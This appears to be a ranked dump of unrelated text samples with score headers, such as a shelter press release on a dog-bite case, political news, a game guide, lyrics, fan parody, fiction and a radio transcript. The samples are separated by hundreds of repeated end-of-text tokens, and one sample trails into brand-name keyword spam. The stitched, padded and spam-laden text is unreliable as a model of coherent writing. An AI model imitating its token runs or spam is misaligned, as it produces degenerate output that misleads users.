illness.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 37; Score = 991232.0 +<|begin_of_text|>October 8, 2015 • + +by Marketing • Posted in: Press Releases + +Austin Pets Alive! promotes the safety of humans and of our animals. + +Neville was taken into Austin Pets Alive!’s rescue program a few months ago. Neville is a young, friendly dog who has never shown any signs of aggression. On September 22, Neville was playing with other dogs in a play yard when a family entered the yard to visit the dogs. The parents were advised by a staff member not to put their small son on the ground, because the dogs were playing energetically and a toddler could easily be accidentally knocked over. However, the child was placed on the ground and allowed to grab Neville, who unfortunately bit the child. + +It is a very unfortunate situation for everyone, as we would never want a child to be harmed. However, we believe this was entirely preventable had our staff’s instructions and common sense been followed. + +The family pleaded to the court system to have the dog killed, and Municipal Court Judge Clervi issued an order that Neville be killed, despite the evidence we presented. + +“We don’t believe this is a dangerous dog,” said Mike Kaviani, APA!’s Dog Behavior Team manager. ”He did not seek out the child to bite, he was simply reacting to the child who cornered him. We haven’t been given any options at all other than killing the dog or we would be taking them. We are saddened and outraged we were not given an opportunity to find a better outcome for Neville.” + +“Dogs can’t speak to us and tell us they don’t like something we are doing,” said Kaviani “They have limited ways to communicate and it’s our job to understand that.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 38; Score = 987136.0 +<|begin_of_text|>New York Times columnist Paul Krugman says that the Republican Party has adopted extreme anti-immigrant positions to appeal to their base, “which is, by and large, elderly white people arguing with empty chairs.” + +During a Sunday panel segment on ABC News, Krugman pointed out that Clint Eastwood’s bizarre conversation with an empty chair at the Republican National Convention last month was illustrative of the party’s base. + +“Arizona is a third Hispanic,” conservative columnist George Will noted. “The Republican Party spent 20 debates in the primary competing to see who could build the longest, thickest, tallest, most lethally-electrified fence. And Hispanics said, ‘I detect some hostility here.’ And it’s going to take a long time to undo that.” + +Krugman agreed that the GOP’s move to the extreme right during the primary had hurt their standing with minority voters. + +“The Republican Party is where it is because that’s where the base is,” Krugman agreed. “You watch that whole primary process, Republican candidates had to appeal to their base, which is, by and large, elderly white people arguing with empty chairs.” + +Tea party favorite Sen. Rand Paul (R-KY) also lamented that the Republican Party had completely given up on winning certain parts of the country. + +“So what I keep telling them is, maybe we need some libertarian-type Republicans who might be popular in those areas,” he explained. “Maybe a less aggressive, more socially tolerant, but still fiscally conservative policy that that may be more libertarian might do better in California, might do better in Oregon, Washington, New England.” + +“Our problem in the presidential election is we’ve given up 150 electoral votes before we get started.” + +Watch this video from ABC’s This Week, broadcast Sept. 9, 2012.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 39; Score = 974848.0 +<|begin_of_text|>I am hooked on Slime Rancher! After playing stressful first person shooters that make my heart beat a million times a minute I needed a more relaxing (not boring!) game. I came across Slime Rancher, and tried the free demo before quickly purchasing the game. Not only is this a relaxing game, but it’s incredibly engaging and fun! After playing for a day here are six things I wish I knew before starting Slime Rancher. + +1. That the “ocean” is not really water. It’s the rotting corpses of millions of cute slimes. Sorry to ruin that pristine ocean view for you. + +2. The massive Slimes (i.e. Gordo) are not bosses to be killed, but super hungry Slimes that want to EAT. Feed those suckers, because when their belly gets too full they’ll die of happiness and trust me, it’s a win-win for everyone. + +3. You can upgrade your corral with a plot collector. This upgrade will suck out all the plorts in your corral and store them in a container on the corner of the corral. I don’t know why this took me so long, but you must use your vac to suck the plorts out of the storage. I’m probably just an idiot, but I wish I had known how to do this before I spent five minutes trying every other button on my keyboard. + +4. These scary nightmare slimes are called Tarr, and good news! They can be defeated. There’s special eery music that accompanies the Tarr and my first encounter with them was frightening. They stretch out arms and eat all the other slimes in the area! They’re incredibly hostile, and will attack on sight. They reminded me of the “nothing” from The Neverending Story novel. When I began Slime Rancher I would run away from the Tarr whenever I saw them, but now I know they can be combated. + +Chuck them into the “ocean” (remember what it really is!) + +Purchase an incinerator for a plot on your ranch and toast those suckers. + +Spray them with water that you get from geysers or ponds. + +Toss them into a pond. + +5. Slimes can’t die from starvation, but they’ll be very upset and hungry! You don’t want your slimes to be upset do you? + +6. The big question I had as I explored was – What Happens When I Die? I did not want to test the theory, but +================================================================================ +Rank = 40; Score = 974848.0 +<|begin_of_text|>I was fast asleep when suddenly I was awoken by a pounding on the door. This was not a knock like, “Hey, what’s up?” or even, “I really need to talk to you.” This was a knock that said, “I am going to get in there, and when I do, it’s gonna suck to be you.” The person outside the door was screaming for my roommate. I looked over to him. + +"Don't open the door!" + +I asked who it was. + +"Just don't open the door." + +I've never been so terrified in my life. + +My roommate called the cops, but it took a while for them to get there. The knocking stopped—a ploy. We could still see the shadow of two feet under the door. He stood out there, stark still and silent. Then the knob started to slowly turn. He was trying to get in. A few minutes before the cops arrived, he left. Honestly, that night had been coming + +a long time. + +When I first met my roommate freshman year, I was cautiously optimistic. He seemed nice enough. I thought I could chill with him, even after he starting talking about drugs the first week of class. I had never done any. The first time he had ever smoked weed was during senior week, and he began to smoke more regularly over the summer. When I met him he smoked twice a week. + +Eventually, he was smoking almost every night out the window of the men’s bathroom. He would come back giggling and stay up all night playing online poker. He also experimented with other substances, like Adderall—to help him stay awake for gambling and more weed. + +He and his buddies would even strangle each other to the point of passing out to get high off the oxygen deprivation. I’m not exactly sure when he started dealing. + +He would get visits from strange girls, beautiful girls who he would bang that night then never see again. Most of them brought little gifts: cigarettes, teddy bears, etc. I thought he just had serious game. + +During the third month of school I talked to the resident assistant (RA) and, without naming specifics, told him that I was very uncomfortable with my roommate. My RA told me my only recourse was to file a formal complaint, but my roommate was popular on the floor. I didn’t want to be the one getting him thrown out. Not to mention the paperwork; finals were coming up. + +Then, one night, early in the spring semester, he and his buddies were in +================================================================================ +Rank = 41; Score = 974848.0 +<|begin_of_text|>The Republican lawmaker’s call to ICE will “almost assuredly” be used to show ‘discriminatory intent,’ an attorney said. + +A Texas lawmaker’s decision to report protesters to immigration police Monday could come back to haunt the state when it defends the law in court, an attorney involved in the case said Thursday. + +On Monday, Representative Matt Rinaldi, R-Irving, called Immigration and Customs Enforcement (ICE) after hundreds of mostly Latino activists filled the House gallery to protest Senate Bill 4, the controversial ‘sanctuary cities’ ban. + +Jose Garza, an attorney representing El Paso County in its suit against SB 4, told the Observer that the incident will “almost assuredly” be used to help establish in court that the Texas Legislature passed the law with “discriminatory intent.” + +“This was a peaceful protest and many were citizens,” Garza said, “and Rinaldi sicced ICE on them because they were brown.” + +Rinaldi, a member of the far-right House Freedom Caucus and an outspoken supporter of SB 4, said in a statement on Monday that he called ICE after seeing signs that read “I am illegal.” After several people, including Democratic lawmakers, said there was no evidence of those signs, Rinaldi clarified in a radio interview Thursday that the signs read “undocumented and unafraid” and “undocumented and here to stay.” + +El Paso County and the City of El Cenizo have both sued the state over SB 4, and Austin and San Antonio have announced plans to take legal action as well. Texas Attorney General Ken Paxton pre-emptively filed his own lawsuit, which he hopes will lead to a judge declaring the law constitutional, shortly after Governor Greg Abbott signed SB 4 into law. + +SB 4 is set to go into effect September 1. Opponents hope a federal injunction will halt the measure before that date. Proving “discriminatory intent” in the lawmaking process is part of their legal strategy. + +Thanks to an amendment by Rinaldi’s fellow House Freedom Caucus member Matt Schaefer, SB 4 will allow police to ask people who’ve been detained — not just arrested — about their immigration status. The law also threatens to jail law enforcement officials who limit cooperation with federal immigration agents. + +Rinaldi’s call to ICE Monday nearly prompted a fistfight on the House floor. Representative Ramon Romero Jr. said Rinaldi’s call to ICE demonstrates how the law licenses discrimination. + +“[Rinaldi] +================================================================================ +Rank = 42; Score = 970752.0 +<|begin_of_text|>Just an inch away from your face I am staring into your eyes You would be surprised if you could see What's an inch from your face But it's impossible I am invisible + +Tiptoeing and holding my breath Almost knocking over a lamp Barely able to contain a sneeze I am invisible I am invisible I am invisible + +Did you notice something? Was there somebody there? No, apparently not There you felt it again Something creeping around That you can't see + +Doing jumping jacks in the bank Dancing through the supermarket Spinning in the courtroom on one leg I am invisible I am invisible I am invisible + +There are details That I haven't worked out Like when I eat my lunch Does it disappear Or do you see it going all the way down? + +Did the cat just learn how to fly? No, I'm only holding him up Did the cat turn on the dishwasher? No, I'm holding his paw Pushing down on the switch Making it look like he's Doing it by himself Cause I'm invisible I am invisible I am invisible<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 43; Score = 962560.0 +<|begin_of_text|>What?! When?! Why wasn't I warned?! + +She did not announce her visit. It seems she was in a hurry. + +God drat it! Close the gates! Lock all the doors! Release the moat sharks! + +She's already here, sire. + +Oh crap oh crap oh crap. Uh, tell her I'm out. + +No, tell her I'm dead! + +Sire. You misunderstand. + +She's here. + +Marthipan! + +hello sheeda + +I haven't seen you in aaaages! + +yeah good times + +Did you miss me? I missed you. + +yes sheeda + +We've got so much to catch up on! I can't wait! + +yes sheeda + +By the way, we're being attacked by pirates. + +yes sheeda + +Wait, what? + +Holy poo poo. + +Jeigan! + +Highness? + +Round up my posse. + +You do not have a "posse" that I am aware of. + +... + +Conscript me a posse. + +Right away, sire. + +Then round 'em up. + +Where's that old fart with my stupid posse? It's been like an hour. + +JEIGAN YOU ARE SLOW AS poo poo + +Wait, Jeigan's on a horse. + +YOUR HORSE IS SLOW AS poo poo + +JEIGAN + +I AM GONNA GET YOU A FASTER HORSE + +You know what? Forget the posse. I can handle this myself. I mean, who's the prince? Who got a gold star in fencing class? Who's a badass? + +... + +Jeigan! Come back here and confirm that I'm a badass! + +okay this isn't going to work actually + +You're so brave, Marthipan! + +SHEEDA + +Do your beeeest! + +loving HELP ME + +Ugh...everything's dark...can't move... + +Marth. + +Buh? + +Marth. Listen carefully. You can't let yourself get killed. You're a Lord. + +...I'm a prince. + +Yes, I know. But for the purposes of this story, you are a Lord. + +But I'm a prince. + +Whatever. The point is, you're important. If you die, it's all over. + +Everyone else can die, though. + +That's okay. + +Who are you? + +God. + +What's this? Grass? Wind? Sunlight?! + +Marth lives! + +I'm only doing this once. Don't gently caress it up again. + +... + +I am Jesus. + +I knew it! + +This is the posse, is it? + +The +================================================================================ +Rank = 44; Score = 950272.0 +<|begin_of_text|>ZEPHYRHILLS — An 84-year-old Zephyrhills woman who rarely left her tiny duplex stepped forward Wednesday as the winner of the largest single jackpot in American lottery history, valued at $590.5 million. + +Shortly after claiming her prize, Gloria C. MacKenzie stepped back into the shadows. + +Lottery officials announced midmorning that the Powerball winner had arrived with the lone winning ticket, which was sold last month at a Zephyrhills Publix. + +"They walked right through the headquarters of the Florida Lottery here in Tallahassee and said, 'I have a winning ticket and I'd like to validate it,' " Lottery Secretary Cynthia O'Connell said at a news conference. + +MacKenzie, her face hidden behind large black sunglasses, arrived with her son Scott, a family friend and her financial and legal advisers. She said nothing to the pack of reporters who swarmed her. + +Neighbors in Zephyrhills said that guarded profile fits with what they know of MacKenzie. + +"She liked to talk, but not with everybody," said Jorge Trapero, who lives in the apartment attached to MacKenzie's, across from a cow pasture. + +He said she was strong: "Sometimes she'd come from the store to buy something and I'd see her over there taking the bags. 'Gloria you want some help?' She'd say, 'No, no, no, it's okay. I can do it.' " + +Neighbor Bruce Featherston described the area as working class — "where people are really struggling." + +"I assumed she was just an elderly lady scraping to get by," he said of MacKenzie. "She never had anything fancy." + +Now she's walking away with a lump sum payment of more than $370 million, before taxes. + +• • • + +In a statement, MacKenzie called the winnings a blessing, and recalled how a person in line at Publix allowed her to go ahead to buy her single Quick Pick ticket. + +Mindy Crandell, 34, was in line at Publix with her two daughters that day, she said, when a woman stepped in front of her. + +"I don't know that she was intentionally cutting," Crandell, who lives in Dade City, said in an interview Wednesday, "or maybe she didn't realize she did it." + +Crandell let it go. She was worried about keeping her 5-year-old, Jeffa, entertained. + +Later, when she heard about the winner she couldn't help but think it might +================================================================================ +Rank = 45; Score = 933888.0 +<|begin_of_text|>The ultra-compact TelePen is a handy collapsible pen that attaches to your keychain. Weighing less than an ounce and measuring less than two inches, you'll hardly notice the diminutive telescoping pen dangling from your keyring. But the TelePen is there when you need it, expanding to nearly the length of a standard pen. Its tough stainless steel exterior protects it from the elements. Includes three black ink refills. + +Attach it to your keyring and you'll always have a pen + +Searching for a pen in a hurry is frustrating. The TelePen mini telescoping pen attaches to your keychain so you'll never again be without a pen. + +You may be thinking, "But I have a fancy mobile phone. It has an app for making me sound like T-Pain, so surely I don't need old technology like a pen!" As awesome as "I am T-Pain" is, you are wrong about not needing a pen. There is no faster way to jot down a note than with a trusty pen. + +Imagine the following scenario: You're talking on said mobile device and your wife is giving you a list of groceries to pick up. Are you going to grab yet another cell phone and fire up its note-taking function in order to write down the list? Surely not because you have the TelePen Telescoping Pen on your keychain! + +Simply push or pull to collapse or expand + +Push or pull the TelePen to shrink or expand the telescoping tubes. When fully extended, give it a sharp tug to remove the pen from the keyring holder. + +The tough TelePen can handle abuse + +Your keychain lives a rough life. Tossed around your house, buried in purses, pockets, and jackets; there's a reason why keys are made from metal. Thankfully, the TelePen can handle its fair share of abuse due to its stainless steel construction. + +Expands from the size of a key to a nearly full-size pen + +When collapsed, the TelePen is a hair under two inches long making it about the size of a standard house key. When expanded, it's nearly the length of a full-size pen. + +With the TelePen, you're not going to feel like you're using one of those miniature golf course pencils. + +Includes three black ink refills + +In addition to the keyring (which is included), each TelePen includes three black ink refills.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 46; Score = 933888.0 +<|begin_of_text|>Chapter One + +The first experience of life was a bright point of light followed by the sound of distant, muted whispers. A flood of sensory information registered self-awareness, when just before there was only a sea of blackness. A new mind took inventory of the world surrounding him: his chest, rising and falling with the sensation of air rushing into his lungs; the taste of saliva and the contraction of throat muscles as he swallowed; hands that opened and closed into fists as he commanded; all virgin experiences, so it seemed, for a man who was just born inside a coffin. + +Lying supine, he blinked several times, struggling to make sense of his narrow confines. A glass shield was just inches from his face, where he gazed with frustrating uncertainty upon a reflection that was his own. An older man, with creases stretched across a high forehead and steel-grey eyes set upon severe cheekbones, returned the bewildered stare. + +Who am I? this lost soul asked, struggling to reach backwards in time for a memory or reference, anything to place this surreal state of being into context. But there was nothing there, and the sea of blackness prevailed. + +As he tried to lift his shoulders, a medical device descended from inside the chamber and passed a bluish light over the entire length of his body. It was then that he realized the base of his skull was fastened to the bed’s surface, and that the connection was through a metallic socket implanted directly into the bone. + +I am a capsuleer, he realized, peering through the glass at a ceiling high above. One of the immortals, but... what happened to me? The device hovered over his squinting eyes before an artificial voice spoke softly: + +‘Good morning. Your vital signs are excellent. Try to relax while I assess the rebuilding progress of your temporal lobe. Scanning...’ + +With the centre light focusing on his eyes, additional beams were projected onto his face. Then he felt a tingling sensation in the back of his head. + +‘I’m going to ask you several questions,‘ the voice continued. He found her voice soothing, despite its artificial tone. ‘Do you know what today’s date is?’ + +‘No,‘ he answered. ‘Where am I?’ + +The voice remained impassive, but gentle. ‘Do you know what your name is?’ + +He was about to answer ‘No’ in desperation again when a bright flash illuminated the room beyond the glass, followed by a loud muffled thud that shook +================================================================================ +Rank = 47; Score = 921600.0 +<|begin_of_text|>Probiotic Bacteria Chill Out Anxious Mice + +Reporting in Proceedings of the National Academy of Sciences, researchers write of reducing anxiety and stress in mice by feeding them a probiotic-laced broth. Study author John Cryan discusses how the gut influences the brain, and whether the same might hold true in humans. + +IRA FLATOW, host: This is SCIENCE FRIDAY. I'm Ira Flatow. You might have heard probiotic bacteria help keep your gut healthy, but could they be good for your brain, too? A study out this week suggests the answer is yes, at least for mice, because mice on a probiotic diet for a couple of weeks were more relaxed than their counterparts who were not. + +They showed fewer visible signs of anxiety, lower levels of stress hormones, even chemical changes in the brain. Sounds a little like valium, doesn't it? Other than signals telling you when you're hungry or full, what connection is there between the intestinal tract and the brain? And why would it be there? + +I know you yogurt lovers out there are probably wondering: Is there any chance this finding might hold true for humans? Well, we'll talk about it. If you'd like to, our number is 1-800-989-8255, 1-800-989-TALK. You can tweet us @scifri, S-C-I-F-R-I, go to our website and talk over there, or you can go to our Facebook page, /scifri. + +My next guest is an author of that probiotic study, published this week in the Proceedings of the National Academy of Scientists. John Cryan is a professor at University College Cork in Ireland, and he joins us by phone. Welcome to SCIENCE FRIDAY, Dr. Cryan. + +JOHN CRYAN: Thank you very much, Ira, it's good to be on. + +FLATOW: This sounds amazing. You fed the lab animals probiotics, and then why would they have any effect on the brain? + +CRYAN: Well, I mean, it's been long known that the brain and the gut communicate, as you mentioned, in terms of feelings of hunger, et cetera. And so what's becoming clearer over the last while is that this brain-gut communication or gut-brain, it's a bidirectional communication, but also that the microbials, which is the gut's flora within the gut, can actually also play an important part in regulating this axis +================================================================================ +Rank = 48; Score = 909312.0 +<|begin_of_text|>Just a little situation I dreamed up one day while eating lunch at my local Whichwich sandwich shop. I'd like to go on record stating that I expect a rather large check from each of the five companies I just advertised. I reach tens of people and in the grand scheme of things, at least three of these companies are not yet household names when speaking of fast food. Well... You're welcome. Because now you are. + +And now I'm hungry. + +THIS COMIC REFERENCES THE KEVIN SPACEY CLASSIC, SE7EN, PRETTY HARD. Y'know. In case you haven't seen that movie. I figure shortly after this comic, John Doe just watches in abject horror as Chris shovels an entire table of sandwiches into his face and chugs two buckets of soda. Defeated, John unties Chris and leaves the house. After sleeping on it, John decides he will get back up on that horse and try this again after he gets the smell out of his kill house. Now, more than ever, he is convinced that America has a lesson it desperately needs to learn. Thanks, Chris. Thanks a LOT. + +-Trent coach black friday hollister cyber monday canada goose cyber monday beats by dre cyber monday Juicy Couture black friday hollister cyber monday coach cyber monday michael kors black friday canada goose cyber monday beats by dre cyber monday michael kors cyber monday canada goose cyber monday coach cyber monday coach black friday lululemon black friday michael kors black friday lululemon cyber monday coach black friday beats by dre black friday coach black friday canada goose black friday kate spade cyber monday michael kors cyber monday lululemon black friday uggs cyber monday kate spade cyber monday coach black friday canada goose black friday north face black friday north face black friday michael kors black friday coach black friday canada goose cyber monday uggs cyber monday canada goose cyber monday Juicy Couture black friday lululemon cyber monday coach cyber monday hollister cyber monday kate spade cyber monday michael kors black friday michael kors Black Friday michael kors Black Friday coach black friday north face cyber monday michael kors Black Friday legend blue 11s legend blue 11s jordan 11 legend blue jordan 11 legend blue legend blue 11s legend blue 11s legend blue 11s jordan 13 black infrared jordan 11 legend blue legend blue 11s legend blue 11s jordan 11 legend blue jordan 13 black infrared jordan 11 +================================================================================ +Rank = 49; Score = 909312.0 +<|begin_of_text|>Mercy (Mercy): I am ready to revive you. (1 charge remaining) + +As my thread ( 